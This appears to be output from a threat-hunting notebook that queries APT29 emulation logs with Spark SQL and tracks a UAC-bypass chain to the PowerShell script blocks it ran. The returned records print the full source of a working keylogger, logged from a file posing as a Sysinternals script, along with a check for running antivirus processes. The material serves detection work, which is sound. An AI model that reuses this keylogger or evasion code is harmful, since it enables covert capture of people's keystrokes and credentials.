-RECORD 1-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Get-Keystrokes {
<#
.SYNOPSIS
 
    Logs keys pressed, time and the active window (when changed).
    Some modifications for Empire by @harmj0y.
    
    PowerSploit Function: Get-Keystrokes
    Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
    Modifications: @harmj0y
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
    
.LINK
    http://www.obscuresec.com/
    http://www.exploit-monday.com/
#>
    Start-Job -Name "Keystrokes" -ScriptBlock {
        Write-Host "`nJobPID`n------`n$PID"
        [Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null

        try
        {
            $ImportDll = [User32]
        }
        catch
        {
            $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
            $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
            $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
            $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class')

            $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
            $FieldArray = [Reflection.FieldInfo[]] @(
                [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
                [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'),
                [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),
                [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
            )

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))
            $FieldValueArray = [Object[]] @(
                'GetAsyncKeyState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]]))
            $FieldValueArray = [Object[]] @(
                'GetKeyboardState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))
            $FieldValueArray = [Object[]] @(
                'MapVirtualKey',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32],
                [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32]))
            $FieldValueArray = [Object[]] @(
                'ToUnicode',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @())
            $FieldValueArray = [Object[]] @(
                'GetForegroundWindow',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $ImportDll = $TypeBuilder.CreateType()
        }

        $LastWindowTitle = ""
        $i=0
        while ($true) {
            Start-Sleep -Milliseconds 40
            $gotit = ""
            $Outout = ""
            
            for ($char = 1; $char -le 254; $char++) {
                $vkey = $char
                $gotit = $ImportDll::GetAsyncKeyState($vkey)
                
                if ($gotit -eq -32767) {

                    #check for keys not mapped by virtual keyboard
                    $LeftShift    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LShiftKey) -band 0x8000) -eq 0x8000
                    $RightShift   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RShiftKey) -band 0x8000) -eq 0x8000
                    $LeftCtrl     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LControlKey) -band 0x8000) -eq 0x8000
                    $RightCtrl    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RControlKey) -band 0x8000) -eq 0x8000
                    $LeftAlt      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LMenu) -band 0x8000) -eq 0x8000
                    $RightAlt     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RMenu) -band 0x8000) -eq 0x8000
                    $TabKey       = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Tab) -band 0x8000) -eq 0x8000
                    $SpaceBar     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Space) -band 0x8000) -eq 0x8000
                    $DeleteKey    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Delete) -band 0x8000) -eq 0x8000
                    $EnterKey     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Return) -band 0x8000) -eq 0x8000
                    $BackSpaceKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Back) -band 0x8000) -eq 0x8000
                    $LeftArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Left) -band 0x8000) -eq 0x8000
                    $RightArrow   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Right) -band 0x8000) -eq 0x8000
                    $UpArrow      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Up) -band 0x8000) -eq 0x8000
                    $DownArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Down) -band 0x8000) -eq 0x8000
                    $LeftMouse    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LButton) -band 0x8000) -eq 0x8000
                    $RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000

                    if ($LeftShift -or $RightShift) {$Outout += '[Shift]'}
                    if ($LeftCtrl  -or $RightCtrl)  {$Outout += '[Ctrl]'}
                    if ($LeftAlt   -or $RightAlt)   {$Outout += '[Alt]'}
                    if ($TabKey)       {$Outout += '[Tab]'}
                    if ($SpaceBar)     {$Outout += '[SpaceBar]'}
                    if ($DeleteKey)    {$Outout += '[Delete]'}
                    if ($EnterKey)     {$Outout += '[Enter]'}
                    if ($BackSpaceKey) {$Outout += '[Backspace]'}
                    if ($LeftArrow)    {$Outout += '[Left Arrow]'}
                    if ($RightArrow)   {$Outout += '[Right Arrow]'}
                    if ($UpArrow)      {$Outout += '[Up Arrow]'}
                    if ($DownArrow)    {$Outout += '[Down Arrow]'}
                    if ($LeftMouse)    {$Outout += '[Left Mouse]'}
                    if ($RightMouse)   {$Outout += '[Right Mouse]'}

                    #check for capslock
                    if ([Console]::CapsLock) {$Outout += '[Caps Lock]'}

                    $scancode = $ImportDll::MapVirtualKey($vkey, 0x3)
                    
                    $kbstate = New-Object Byte[] 256
                    $checkkbstate = $ImportDll::GetKeyboardState($kbstate)
                    
                    $mychar = New-Object -TypeName "System.Text.StringBuilder";
                    $unicode_res = $ImportDll::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)

                    #get the title of the foreground window
                    $TopWindow = $ImportDll::GetForegroundWindow()
                    $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
                    
                    if ($unicode_res -gt 0) {
                        if ($WindowTitle -ne $LastWindowTitle){
                            # if the window has changed
                            $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
                            $Outout = "`n`n$WindowTitle - $TimeStamp`n"
                            $LastWindowTitle = $WindowTitle
                        }
                        $Outout += $mychar.ToString()
                        $Outout
                    }
                }
            }
        }
    }
}

ScriptBlock ID: fa9f2b3a-3f5e-4d3c-93c9-7172cc073add
Path: C:\Program Files\SysinternalsSuite\psversion.ps1 
-RECORD 2-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Keystroke-Check {
    Get-Process | Where-Object { $_.ProcessName -Eq "avp" -or $_.ProcessName -Eq "acs" -or $_.ProcessName -Eq "outpost" -or $_.ProcessName -Eq "mcvsescn" -or $_.ProcessName -Eq "mcods" -or $_.ProcessName -Eq "navapsvc" -or $_.ProcessName -Eq "kav" -or $_.ProcessName -Eq "AvastSvc" -or $_.ProcessName -Eq "AvastUi" -or $_.ProcessName -Eq "nod32krn" -or $_.ProcessName -Eq "nod32" -or $_.ProcessName -Eq "ekern" -or $_.ProcessName -Eq "dwengine" -or $_.ProcessName -Eq "MsMpEng" -or $_.ProcessName -Eq "msseces" -or $_.ProcessName -Eq "ekrn" -or $_.ProcessName -Eq "savservice" -or $_.ProcessName -Eq "scfservice" -or $_.ProcessName -Eq "savadminservice" }
}

ScriptBlock ID: a2a6be75-3568-4d81-a0ca-40a31de44589
Path: C:\Program Files\SysinternalsSuite\psversion.ps1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
-RECORD 3-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
get-process

ScriptBlock ID: 66a7f650-8a84-4dcf-a0f7-41d06de51f5c
Path:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  

Query ID:294DFB34-1FA8-464D-B85C-F2AE163DB4A9

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
    SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
    FROM apt29Host d
    INNER JOIN(
      SELECT a.ProcessId, a.NewProcessId
      FROM apt29Host a
      INNER JOIN (
        SELECT NewProcessId
        FROM apt29Host
        WHERE LOWER(Channel) = "security"
            AND EventID = 4688
            AND LOWER(NewProcessName) LIKE "%control.exe"
            AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
      ) b
      ON a.ProcessId = b.NewProcessId
      WHERE LOWER(a.Channel) = "security"
        AND a.EventID = 4688
        AND a.MandatoryLabel = "S-1-16-12288"
        AND a.TokenElevationType = "%%1937"
    ) c
    ON d.ProcessId = c.NewProcessId
    WHERE LOWER(d.Channel) = "security"
      AND d.EventID = 4688
      AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND f.EventID = 4104
    AND LOWER(f.ScriptBlockText) LIKE "%get-process%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
Invoke-Command -ComputerName NASHUA -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId

ScriptBlock ID: 806f4593-7cce-4e2c-8645-8cb798c3bedd
Path:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               
-RECORD 1-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------